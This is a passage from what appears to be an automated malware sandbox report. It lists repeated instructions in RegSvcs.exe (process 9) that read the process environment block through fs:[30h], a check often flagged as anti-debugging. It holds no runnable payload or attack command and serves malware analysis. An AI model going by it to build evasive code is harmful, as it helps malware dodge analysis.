                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0535 mov eax, dword ptr fs:[00000030h]9_2_014F0535
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0535 mov eax, dword ptr fs:[00000030h]9_2_014F0535
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0535 mov eax, dword ptr fs:[00000030h]9_2_014F0535
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0535 mov eax, dword ptr fs:[00000030h]9_2_014F0535
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0535 mov eax, dword ptr fs:[00000030h]9_2_014F0535
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151A5D0 mov eax, dword ptr fs:[00000030h]9_2_0151A5D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151A5D0 mov eax, dword ptr fs:[00000030h]9_2_0151A5D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E5CF mov eax, dword ptr fs:[00000030h]9_2_0151E5CF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E5CF mov eax, dword ptr fs:[00000030h]9_2_0151E5CF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E65D0 mov eax, dword ptr fs:[00000030h]9_2_014E65D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E25E0 mov eax, dword ptr fs:[00000030h]9_2_014E25E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E5E7 mov eax, dword ptr fs:[00000030h]9_2_0150E5E7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E5E7 mov eax, dword ptr fs:[00000030h]9_2_0150E5E7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E5E7 mov eax, dword ptr fs:[00000030h]9_2_0150E5E7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E5E7 mov eax, dword ptr fs:[00000030h]9_2_0150E5E7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E5E7 mov eax, dword ptr fs:[00000030h]9_2_0150E5E7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E5E7 mov eax, dword ptr fs:[00000030h]9_2_0150E5E7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E5E7 mov eax, dword ptr fs:[00000030h]9_2_0150E5E7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E5E7 mov eax, dword ptr fs:[00000030h]9_2_0150E5E7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151C5ED mov eax, dword ptr fs:[00000030h]9_2_0151C5ED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151C5ED mov eax, dword ptr fs:[00000030h]9_2_0151C5ED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E2582 mov eax, dword ptr fs:[00000030h]9_2_014E2582
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E2582 mov ecx, dword ptr fs:[00000030h]9_2_014E2582
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E59C mov eax, dword ptr fs:[00000030h]9_2_0151E59C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01514588 mov eax, dword ptr fs:[00000030h]9_2_01514588
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015045B1 mov eax, dword ptr fs:[00000030h]9_2_015045B1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015045B1 mov eax, dword ptr fs:[00000030h]9_2_015045B1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015605A7 mov eax, dword ptr fs:[00000030h]9_2_015605A7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015605A7 mov eax, dword ptr fs:[00000030h]9_2_015605A7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015605A7 mov eax, dword ptr fs:[00000030h]9_2_015605A7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150245A mov eax, dword ptr fs:[00000030h]9_2_0150245A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0159A456 mov eax, dword ptr fs:[00000030h]9_2_0159A456
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014D645D mov eax, dword ptr fs:[00000030h]9_2_014D645D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E443 mov eax, dword ptr fs:[00000030h]9_2_0151E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E443 mov eax, dword ptr fs:[00000030h]9_2_0151E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E443 mov eax, dword ptr fs:[00000030h]9_2_0151E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E443 mov eax, dword ptr fs:[00000030h]9_2_0151E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E443 mov eax, dword ptr fs:[00000030h]9_2_0151E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E443 mov eax, dword ptr fs:[00000030h]9_2_0151E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E443 mov eax, dword ptr fs:[00000030h]9_2_0151E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151E443 mov eax, dword ptr fs:[00000030h]9_2_0151E443
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150A470 mov eax, dword ptr fs:[00000030h]9_2_0150A470
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150A470 mov eax, dword ptr fs:[00000030h]9_2_0150A470
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150A470 mov eax, dword ptr fs:[00000030h]9_2_0150A470
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156C460 mov ecx, dword ptr fs:[00000030h]9_2_0156C460
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01518402 mov eax, dword ptr fs:[00000030h]9_2_01518402
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01518402 mov eax, dword ptr fs:[00000030h]9_2_01518402
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01518402 mov eax, dword ptr fs:[00000030h]9_2_01518402
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151A430 mov eax, dword ptr fs:[00000030h]9_2_0151A430
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DC427 mov eax, dword ptr fs:[00000030h]9_2_014DC427
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DE420 mov eax, dword ptr fs:[00000030h]9_2_014DE420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DE420 mov eax, dword ptr fs:[00000030h]9_2_014DE420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DE420 mov eax, dword ptr fs:[00000030h]9_2_014DE420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01566420 mov eax, dword ptr fs:[00000030h]9_2_01566420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01566420 mov eax, dword ptr fs:[00000030h]9_2_01566420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01566420 mov eax, dword ptr fs:[00000030h]9_2_01566420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01566420 mov eax, dword ptr fs:[00000030h]9_2_01566420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01566420 mov eax, dword ptr fs:[00000030h]9_2_01566420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01566420 mov eax, dword ptr fs:[00000030h]9_2_01566420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01566420 mov eax, dword ptr fs:[00000030h]9_2_01566420
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E04E5 mov ecx, dword ptr fs:[00000030h]9_2_014E04E5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0159A49A mov eax, dword ptr fs:[00000030h]9_2_0159A49A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015144B0 mov ecx, dword ptr fs:[00000030h]9_2_015144B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E64AB mov eax, dword ptr fs:[00000030h]9_2_014E64AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156A4B0 mov eax, dword ptr fs:[00000030h]9_2_0156A4B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522750 mov eax, dword ptr fs:[00000030h]9_2_01522750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522750 mov eax, dword ptr fs:[00000030h]9_2_01522750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01564755 mov eax, dword ptr fs:[00000030h]9_2_01564755
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156E75D mov eax, dword ptr fs:[00000030h]9_2_0156E75D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151674D mov esi, dword ptr fs:[00000030h]9_2_0151674D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151674D mov eax, dword ptr fs:[00000030h]9_2_0151674D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151674D mov eax, dword ptr fs:[00000030h]9_2_0151674D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E0750 mov eax, dword ptr fs:[00000030h]9_2_014E0750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E8770 mov eax, dword ptr fs:[00000030h]9_2_014E8770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0770 mov eax, dword ptr fs:[00000030h]9_2_014F0770
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01510710 mov eax, dword ptr fs:[00000030h]9_2_01510710
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151C700 mov eax, dword ptr fs:[00000030h]9_2_0151C700
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E0710 mov eax, dword ptr fs:[00000030h]9_2_014E0710
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155C730 mov eax, dword ptr fs:[00000030h]9_2_0155C730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151273C mov eax, dword ptr fs:[00000030h]9_2_0151273C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151273C mov ecx, dword ptr fs:[00000030h]9_2_0151273C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151273C mov eax, dword ptr fs:[00000030h]9_2_0151273C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151C720 mov eax, dword ptr fs:[00000030h]9_2_0151C720
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151C720 mov eax, dword ptr fs:[00000030h]9_2_0151C720
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EC7C0 mov eax, dword ptr fs:[00000030h]9_2_014EC7C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015607C3 mov eax, dword ptr fs:[00000030h]9_2_015607C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E47FB mov eax, dword ptr fs:[00000030h]9_2_014E47FB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E47FB mov eax, dword ptr fs:[00000030h]9_2_014E47FB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156E7E1 mov eax, dword ptr fs:[00000030h]9_2_0156E7E1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015027ED mov eax, dword ptr fs:[00000030h]9_2_015027ED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015027ED mov eax, dword ptr fs:[00000030h]9_2_015027ED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015027ED mov eax, dword ptr fs:[00000030h]9_2_015027ED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158678E mov eax, dword ptr fs:[00000030h]9_2_0158678E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E07AF mov eax, dword ptr fs:[00000030h]9_2_014E07AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015947A0 mov eax, dword ptr fs:[00000030h]9_2_015947A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014FC640 mov eax, dword ptr fs:[00000030h]9_2_014FC640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01512674 mov eax, dword ptr fs:[00000030h]9_2_01512674
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151A660 mov eax, dword ptr fs:[00000030h]9_2_0151A660
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151A660 mov eax, dword ptr fs:[00000030h]9_2_0151A660
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A866E mov eax, dword ptr fs:[00000030h]9_2_015A866E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A866E mov eax, dword ptr fs:[00000030h]9_2_015A866E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F260B mov eax, dword ptr fs:[00000030h]9_2_014F260B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F260B mov eax, dword ptr fs:[00000030h]9_2_014F260B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F260B mov eax, dword ptr fs:[00000030h]9_2_014F260B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F260B mov eax, dword ptr fs:[00000030h]9_2_014F260B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F260B mov eax, dword ptr fs:[00000030h]9_2_014F260B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F260B mov eax, dword ptr fs:[00000030h]9_2_014F260B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F260B mov eax, dword ptr fs:[00000030h]9_2_014F260B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01522619 mov eax, dword ptr fs:[00000030h]9_2_01522619
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155E609 mov eax, dword ptr fs:[00000030h]9_2_0155E609
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E262C mov eax, dword ptr fs:[00000030h]9_2_014E262C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014FE627 mov eax, dword ptr fs:[00000030h]9_2_014FE627
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01516620 mov eax, dword ptr fs:[00000030h]9_2_01516620
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01518620 mov eax, dword ptr fs:[00000030h]9_2_01518620
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151A6C7 mov ebx, dword ptr fs:[00000030h]9_2_0151A6C7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151A6C7 mov eax, dword ptr fs:[00000030h]9_2_0151A6C7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155E6F2 mov eax, dword ptr fs:[00000030h]9_2_0155E6F2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155E6F2 mov eax, dword ptr fs:[00000030h]9_2_0155E6F2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155E6F2 mov eax, dword ptr fs:[00000030h]9_2_0155E6F2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155E6F2 mov eax, dword ptr fs:[00000030h]9_2_0155E6F2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015606F1 mov eax, dword ptr fs:[00000030h]9_2_015606F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015606F1 mov eax, dword ptr fs:[00000030h]9_2_015606F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E4690 mov eax, dword ptr fs:[00000030h]9_2_014E4690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E4690 mov eax, dword ptr fs:[00000030h]9_2_014E4690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015166B0 mov eax, dword ptr fs:[00000030h]9_2_015166B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151C6A6 mov eax, dword ptr fs:[00000030h]9_2_0151C6A6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01560946 mov eax, dword ptr fs:[00000030h]9_2_01560946
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01584978 mov eax, dword ptr fs:[00000030h]9_2_01584978
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01584978 mov eax, dword ptr fs:[00000030h]9_2_01584978
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156C97C mov eax, dword ptr fs:[00000030h]9_2_0156C97C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01506962 mov eax, dword ptr fs:[00000030h]9_2_01506962
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01506962 mov eax, dword ptr fs:[00000030h]9_2_01506962
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01506962 mov eax, dword ptr fs:[00000030h]9_2_01506962
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0152096E mov eax, dword ptr fs:[00000030h]9_2_0152096E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0152096E mov edx, dword ptr fs:[00000030h]9_2_0152096E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0152096E mov eax, dword ptr fs:[00000030h]9_2_0152096E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156C912 mov eax, dword ptr fs:[00000030h]9_2_0156C912
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014D8918 mov eax, dword ptr fs:[00000030h]9_2_014D8918
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014D8918 mov eax, dword ptr fs:[00000030h]9_2_014D8918
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155E908 mov eax, dword ptr fs:[00000030h]9_2_0155E908
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155E908 mov eax, dword ptr fs:[00000030h]9_2_0155E908
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156892A mov eax, dword ptr fs:[00000030h]9_2_0156892A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0157892B mov eax, dword ptr fs:[00000030h]9_2_0157892B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015149D0 mov eax, dword ptr fs:[00000030h]9_2_015149D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015AA9D3 mov eax, dword ptr fs:[00000030h]9_2_015AA9D3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015769C0 mov eax, dword ptr fs:[00000030h]9_2_015769C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA9D0 mov eax, dword ptr fs:[00000030h]9_2_014EA9D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA9D0 mov eax, dword ptr fs:[00000030h]9_2_014EA9D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA9D0 mov eax, dword ptr fs:[00000030h]9_2_014EA9D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA9D0 mov eax, dword ptr fs:[00000030h]9_2_014EA9D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA9D0 mov eax, dword ptr fs:[00000030h]9_2_014EA9D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EA9D0 mov eax, dword ptr fs:[00000030h]9_2_014EA9D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015129F9 mov eax, dword ptr fs:[00000030h]9_2_015129F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015129F9 mov eax, dword ptr fs:[00000030h]9_2_015129F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156E9E0 mov eax, dword ptr fs:[00000030h]9_2_0156E9E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E09AD mov eax, dword ptr fs:[00000030h]9_2_014E09AD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E09AD mov eax, dword ptr fs:[00000030h]9_2_014E09AD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015689B3 mov esi, dword ptr fs:[00000030h]9_2_015689B3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015689B3 mov eax, dword ptr fs:[00000030h]9_2_015689B3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015689B3 mov eax, dword ptr fs:[00000030h]9_2_015689B3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F29A0 mov eax, dword ptr fs:[00000030h]9_2_014F29A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F29A0 mov eax, dword ptr fs:[00000030h]9_2_014F29A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F29A0 mov eax, dword ptr fs:[00000030h]9_2_014F29A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F29A0 mov eax, dword ptr fs:[00000030h]9_2_014F29A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F29A0 mov eax, dword ptr fs:[00000030h]9_2_014F29A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F29A0 mov eax, dword ptr fs:[00000030h]9_2_014F29A0
